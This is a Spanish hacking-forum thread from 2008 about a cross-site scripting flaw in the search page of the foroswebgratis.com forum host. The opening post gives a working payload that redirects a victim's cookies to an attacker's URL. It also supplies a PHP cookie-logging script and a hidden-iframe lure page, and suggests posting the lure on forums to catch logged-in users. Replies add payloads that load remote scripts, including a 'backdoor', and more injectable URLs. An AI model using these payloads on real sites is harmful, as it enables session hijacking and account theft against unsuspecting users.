elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  [XSS] foroswebgratis		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: [XSS] foroswebgratis  (Leído 8,386 veces)
6666

Desconectado Desconectado

Mensajes: 146


Wikileaks.org


Ver Perfil
[XSS] foroswebgratis
« en: 28 Enero 2008, 03:52 am »
en realidad el xss esta de hace bastante tiempo..siempre sta web tuvo multiples vulnerabilidades..la primero vez que encontre uno fue solo de accidente en el panel de administracion del foro ejempl: yo era admin-Foro.php?id_foro=1 cambia por 2 y ya estaba en la cuenta del foro numero 2..luego lo repararon..al poco tiempo habia encontrado otro..donde se podian borrar foros asi de la nada con solo dar click en un enlace..tmb lo arreglaron..y bue ahora este xss.

el error esta en el buscador de la web  "home-buscador-run.php"

link:

Código:
http://www.foroswebgratis.com/home-buscador-run.php?buscar=<img src=http: onerror=h=String.fromCharCode(**tu web encodeada**);document.location=h.concat(document.cookie) />


y aqui la tabla para encodearla:
son los de la columna code..

http://ttssh2.sourceforge.jp/manual/en/macro/appendixes/ascii.html

la web encodeada quedaria asi: http://www.misitio.com/s.php?c=

grabador de cookies(s.php):

Código:
<?php
 $cookie = $_GET['c'];
 $ip = getenv ('REMOTE_ADDR');
 $date=date("m/d/Y g:i:s a");
 $referer=getenv ('HTTP_REFERER');
 $fl = fopen('log.txt', 'a');
 fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
 fclose($fl);
?>


index.htm

Código:
<iframe width="1" height="1" src="http://www.foroswebgratis.com/home-buscador-run.php?buscar=<img src=http: onerror=h=String.fromCharCode(**tu web encodeada**);document.location=h.concat(document.cookie) />" scrolling="no" name="hola" align="middle" border="0" frameborder="0">

y listo solo le mandas la web donde tengo el codigo de index.htm a la victima y robara su cookie.(tiene q estar logueada).lo ideal es ponerla como post en algun foro.

saludos!
« Última modificación: 28 Enero 2008, 05:26 am por z1x2c3z1x2c3| » En línea
sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: [XSS] foroswebgratis
« Respuesta #1 en: 28 Enero 2008, 04:57 am »
Para codificar puedes usar..
javascript:x=[];for each(s in "tu-pagina-web")x.push(s.charCodeAt(0));x;

Lee la politica de disclosure.. debes colocar un enlace a una web tuya donde reportes esta vulnerabilidad.

Saludos!!
En línea
Leer reglas
- WarZone.elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: [XSS] foroswebgratis
« Respuesta #2 en: 28 Enero 2008, 15:16 pm »
g00d, el "string line" que buscaba, me gusto hacerlo directo r0x.

thanks sirdarckgatito

-berz3k.

En línea
sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: [XSS] foroswebgratis
« Respuesta #3 en: 29 Enero 2008, 03:55 am »
Ahmm no funciona en IExplorer.. porque uso algo de javascript 1.7

Esto funciona en IExplorer y Opera y Firefox:
javascript:"tu-pagina-web".replace(/./g,function(x){return x.charCodeAt(0)+","});
En línea
Leer reglas
- WarZone.elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
6666

Desconectado Desconectado

Mensajes: 146


Wikileaks.org


Ver Perfil
Re: [XSS] foroswebgratis
« Respuesta #4 en: 29 Enero 2008, 22:29 pm »
woow! la verdad que me sirvio ese aporte.
En línea
Cicklow


Desconectado Desconectado

Mensajes: 604


-=Cicklow SOFT®=-


Ver Perfil WWW
Re: [XSS] foroswebgratis
« Respuesta #5 en: 18 Marzo 2008, 23:11 pm »
Mejor esto jiji:
http://www.foroswebgratis.com/home-buscador-run.php?buscar=%3Cscript%20src=http://ha.ckers.org/xss.js%3E%3C/script%3E
Osea:
http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script src=http://ha.ckers.org/xss.js></script>
Aca mas info ;)

http://ha.ckers.org/xss.html
En línea
www.cicklow.com . Solo Soy Un Ciego que Ve El Sonido Del Silencio
Cicklow


Desconectado Desconectado

Mensajes: 604


-=Cicklow SOFT®=-


Ver Perfil WWW
Re: [XSS] foroswebgratis
« Respuesta #6 en: 18 Marzo 2008, 23:22 pm »
Tambien prove inyectando el Backdoor de:
http://foro.elhacker.net/index.php/topic,197376.0.html
Y funciona de maravilla:

Lo coloque en localhost para probar:
http://www.foroswebgratis.com/home-buscador-run.php?buscar=%3Cscript%20src=http://127.0.0.1/cicklow/Hack/shell.js%3E%3C/script%3E
En línea
www.cicklow.com . Solo Soy Un Ciego que Ve El Sonido Del Silencio
6666

Desconectado Desconectado

Mensajes: 146


Wikileaks.org


Ver Perfil
Re: [XSS] foroswebgratis nuevos XSS.
« Respuesta #7 en: 1 Abril 2008, 08:09 am »
si funciona de maravilla el backdoor estaria bueno agregarle màs funciones ;).

aca los nuevos XSS.

http://www.foroswebgratis.com/home-buscador-run.php?buscar=><h1>XSS
http://www.foroswebgratis.com/new_user.php?Mail="</form><h1>XSS
imagenes:

http://img210.¡mageshack.us/img210/4825/xss1xb5.jpg
http://img210.¡mageshack.us/img210/4185/xss2wz2.jpg
« Última modificación: 1 Abril 2008, 08:13 am por z1x2c3z1x2c3| » En línea
Achernar


Desconectado Desconectado

Mensajes: 317



Ver Perfil
Re: [XSS] foroswebgratis
« Respuesta #8 en: 8 Abril 2008, 00:30 am »
Recien estoy aprendiendo estoy y leyendo algunos papers, tengo unas dudas..

1) porque esto SI se ejecuta:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script%20src=http://ha.ckers.org/xss.js></script>

y esto NO se ejecuta:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script>alert("XSS")</script>

 :huh:

2) cuando se roban cookies... son cookies de la pagina vulnerable o no?

Gracias.
En línea
Asfasfos

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: [XSS] foroswebgratis
« Respuesta #9 en: 8 Abril 2008, 18:00 pm »
Citar
1) porque esto SI se ejecuta:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script%20src=http://ha.ckers.org/xss.js></script>

y esto NO se ejecuta:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script>alert("XSS")</script>

Seguramente por las comillas dobles

Citar
2) cuando se roban cookies... son cookies de la pagina vulnerable o no?

Depende de si el usuario que ejecuta el XSS está logueado o no, si lo está entonces seguramente si que robes cookies válidas
En línea
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines